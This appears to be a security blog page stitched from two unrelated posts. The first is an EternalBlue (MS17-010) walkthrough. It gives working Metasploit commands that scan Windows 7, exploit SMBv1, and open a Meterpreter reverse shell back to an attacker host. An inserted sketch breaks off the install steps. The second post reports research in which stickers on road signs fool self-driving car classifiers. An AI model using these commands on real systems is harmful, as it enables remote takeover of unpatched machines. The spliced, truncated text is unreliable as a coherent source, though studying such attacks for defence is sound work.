Attacking Windows Platform with EternalBlue Exploit via Android Phones | MS17-010

Introduction

On 14 April 2017, a hacker group known by the name of Shadow Brokers leaked an exploitation toolkit used by the National Security Agency (NSA). The leak was later used as part of the worldwide WannaCry ransomware attack. According to former NSA employees, EternalBlue is one of the exploits developed and used by the NSA.

Lab Environment

Target Machine: Windows 7 Ultimate x64
Attacker Machine: Android 5.1

What is EternalBlue

EternalBlue exploits a vulnerability in the Server Message Block (SMB) protocol of various Microsoft Windows platforms, catalogued as CVE-2017-0144. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server (see the sketch below).

Windows 7 Operating System Releases Affected by EternalBlue

Installing Metasploit Framework on Android

Step 1: Download Termux from the Play Store....
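Before the Termux steps continue, here is a rough sketch of what the msfconsole side of the attack looks like once Metasploit is installed. This is not the post's exact walkthrough: the scanner and exploit modules (auxiliary/scanner/smb/smb_ms17_010 and exploit/windows/smb/ms17_010_eternalblue) are standard Metasploit modules for MS17-010, while the IP addresses are hypothetical placeholders for the lab machines listed above.

msfconsole

# 1. Verify that the target is vulnerable to MS17-010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.10          # hypothetical Windows 7 target IP
run

# 2. Fire the EternalBlue exploit against the vulnerable host
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10          # use RHOST on older Metasploit 4.x builds
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.20           # hypothetical Android/Termux attacker IP
exploit

If the exploit lands, Metasploit opens a Meterpreter session on the Windows 7 target, giving the Android phone remote control over the machine.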

Self-driving Cars Can be hacked by just putting stickers on street signs


Car hacking is a hot topic, though it's not new for researchers to hack cars. They have previously demonstrated how to hijack a car remotely, how to disable a car's crucial functions like airbags, and even how to steal cars.

But the latest car hacking trick doesn't require any extraordinary skills to accomplish. All it takes is a simple sticker on a sign board to confuse a self-driving car and cause an accident.

Isn't that dangerous?

A team of researchers from the University of Washington demonstrated how anyone could print stickers at home and place them on a few road signs to trick "most" autonomous cars into misidentifying those signs, potentially causing accidents.

According to the researchers, the image recognition systems used by most autonomous cars fail to read road signs correctly if the signs are altered by placing stickers or posters over part or all of the sign.

In a research paper titled "Robust Physical-World Attacks on Machine Learning Models," the researchers demonstrated several ways to disrupt how autonomous cars read and classify road signs using just a colour printer and a camera.

By simply adding "Love" and "Hate" graphics onto a STOP sign, the researchers were able to trick the car's image-detection algorithms into classifying it as a Speed Limit 45 sign in 100 percent of test cases.

The researchers also performed the same test on a RIGHT TURN sign and found that the cars wrongly classified it as a STOP sign two-thirds of the time.

The researchers did not stop there. They also applied smaller stickers to a STOP sign to camouflage the visual disturbance as street art, and the car still misclassified the sign in 100 percent of test cases.

The research was carried out by Ivan Evtimov, Kevin Eykholt, Earlence Fernandes, Tadayoshi Kohno, Bo Li, Atul Prakash, Amir Rahmati, and Dawn Song.


Although the researchers did not reveal which manufacturer's self-driving car they used in their experiments, threats like this once again make us think twice about owning one in the future.
